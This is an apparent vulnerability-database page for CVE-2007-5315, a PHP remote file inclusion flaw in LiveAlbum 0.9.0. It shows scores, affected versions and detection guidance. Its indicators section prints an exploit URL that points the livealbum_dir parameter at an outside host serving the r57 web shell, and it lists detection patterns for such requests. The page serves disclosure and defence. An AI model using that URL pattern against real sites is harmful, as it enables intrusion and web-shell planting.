cbcvebase.
CVE-2007-5315
published 2007-10-09

CVE-2007-5315: PHP remote file inclusion vulnerability in common.php in LiveAlbum 0.9.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP…

PriorityP344medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
38.56%
98.4th percentile
PHP remote file inclusion vulnerability in common.php in LiveAlbum 0.9.0, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the livealbum_dir parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
softpedialivealbum

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://[TARGET]/[PATH]/common.php?livealbum_dir=http://xmors.by.ry/r57.php?
domainxmors.by.ry
path/common.php
filenamer57.php
  • Detect HTTP requests to common.php with a remote URL supplied in the livealbum_dir parameter, indicating RFI exploitation attempt.
  • Monitor GET/POST requests where the livealbum_dir parameter contains an http:// or https:// URL, especially those ending with a trailing '?' (null-byte/parameter injection pattern).
  • Presence of r57.php in the livealbum_dir parameter value is a strong indicator of RFI shell-drop activity.
  • ·The vulnerability is only exploitable when register_globals is enabled in the PHP configuration; installations with register_globals disabled are not affected.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.